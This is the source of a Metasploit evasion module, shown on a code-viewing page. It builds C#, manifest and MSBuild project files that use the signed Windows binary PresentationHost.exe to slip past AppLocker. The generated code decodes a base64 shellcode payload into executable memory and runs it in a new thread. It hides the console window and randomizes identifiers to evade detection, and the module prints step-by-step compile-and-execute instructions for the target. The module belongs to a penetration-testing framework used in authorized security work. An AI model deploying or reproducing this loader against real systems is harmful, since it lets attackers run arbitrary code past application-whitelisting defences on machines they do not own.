Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_presentationhost.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',

13
        'Description' => %q{

14
          This module will assist you in evading Microsoft

15
          Windows Applocker and Software Restriction Policies.

16
          This technique utilises the Microsoft signed binary

17
          PresentationHost.exe to execute user supplied code.

18
        },

19
        'Author' => [

20
          'Nick Tyrer <@NickTyrer>', # module development

21
          'Casey Smith' # presentationhost bypass research

22
        ],

23
        'License' => MSF_LICENSE,

24
        'Platform' => 'win',

25
        'Arch' => [ARCH_X86],

26
        'Targets' => [['Microsoft Windows', {}]]

27
      )

28
    )

29


30
    register_options(

31
      [

32
        OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),

33
        OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),

34
        OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])

35
      ]

36
    )

37


38
    deregister_options('FILENAME')

39
  end

40


41
  def build_payload

42
    Rex::Text.encode_base64(payload.encoded)

43
  end

44


45
  def obfu

46
    Rex::Text.rand_text_alpha 8

47
  end

48


49
  def presentationhost_xaml_cs

50
    esc = build_payload

51
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

52
    <<~HEREDOC

53
      using System;

54
      class #{mod[0]}{

55
      static void Main(string[] args){

56
      IntPtr #{mod[1]};

57
      #{mod[1]} = GetConsoleWindow();

58
      ShowWindow(#{mod[1]}, #{mod[2]});

59
      string #{mod[3]} = "#{esc}";

60
      byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});

61
      byte[] #{mod[5]} = #{mod[4]};

62
      IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});

63
      System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);

64
      IntPtr #{mod[9]} = IntPtr.Zero;

65
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}

66
      private static Int32 #{mod[7]}=0x1000;

67
      private static IntPtr #{mod[8]}=(IntPtr)0x40;

68
      private static UInt32 #{mod[10]} = 0xFFFFFFFF;

69
      [System.Runtime.InteropServices.DllImport("kernel32")]

70
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

71
      [System.Runtime.InteropServices.DllImport("kernel32")]

72
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

73
      [System.Runtime.InteropServices.DllImport("kernel32")]

74
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

75
      [System.Runtime.InteropServices.DllImport("user32.dll")]

76
      static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);

77
      [System.Runtime.InteropServices.DllImport("Kernel32")]

78
      private static extern IntPtr GetConsoleWindow();

79
      const int #{mod[2]} = 0;}

80
    HEREDOC

81
  end

82


83
  def presentationhost_manifest

84
    <<~HEREDOC

85
      <?xml version="1.0" encoding="utf-8"?>

86
      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">

87
      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />

88
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">

89
      <security>

90
      <applicationRequestMinimum>

91
      <defaultAssemblyRequest permissionSetReference="Custom" />

92
      <PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />

93
      </applicationRequestMinimum>

94
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">

95
      <requestedExecutionLevel level="asInvoker" uiAccess="false" />

96
      </requestedPrivileges>

97
      </security>

98
      </trustInfo>

99
      </assembly>

100
    HEREDOC

101
  end

102


103
  def presentationhost_csproj

104
    <<~HEREDOC

105
      <?xml version="1.0" encoding="utf-8"?>

106
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

107
      <Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />

108
      <PropertyGroup>

109
      <Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>

110
      <Platform Condition=" '$(Platform)' == '' ">x86</Platform>

111
      <OutputType>WinExe</OutputType>

112
      <HostInBrowser>true</HostInBrowser>

113
      <GenerateManifests>true</GenerateManifests>

114
      <SignManifests>false</SignManifests>

115
      </PropertyGroup>

116
      <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">

117
      <Optimize>true</Optimize>

118
      <OutputPath>.</OutputPath>

119
      </PropertyGroup>

120
      <ItemGroup>

121
      <Reference Include="System" />

122
      </ItemGroup>

123
      <ItemGroup>

124
      <Compile Include="#{datastore['CS_FILE']}">

125
      <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>

126
      <SubType>Code</SubType>

127
      </Compile>

128
      </ItemGroup>

129
      <ItemGroup>

130
      <None Include="#{datastore['MANIFEST_FILE']}" />

131
      </ItemGroup>

132
      <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />

133
      </Project>

134
    HEREDOC

135
  end

136


137
  def file_format_filename(name = '')

138
    name.empty? ? @fname : @fname = name

139
  end

140


141
  def create_files

142
    f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']

143
    f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')

144
    f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']

145
    f2 << '.manifest' unless f2.downcase.end_with?('.manifest')

146
    f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']

147
    f3 << '.csproj' unless f3.downcase.end_with?('.csproj')

148
    cs_file = presentationhost_xaml_cs

149
    manifest_file = presentationhost_manifest

150
    csproj_file = presentationhost_csproj

151
    file_format_filename(f1)

152
    file_create(cs_file)

153
    file_format_filename(f2)

154
    file_create(manifest_file)

155
    file_format_filename(f3)

156
    file_create(csproj_file)

157
  end

158


159
  def instructions

160
    print_status "Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target"

161
    print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['CSPROJ_FILE']}"

162
    print_status "Execute using: C:\\Windows\\System32\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}"

163
  end

164


165
  def run

166
    create_files

167
    instructions

168
  end

169
end

170


171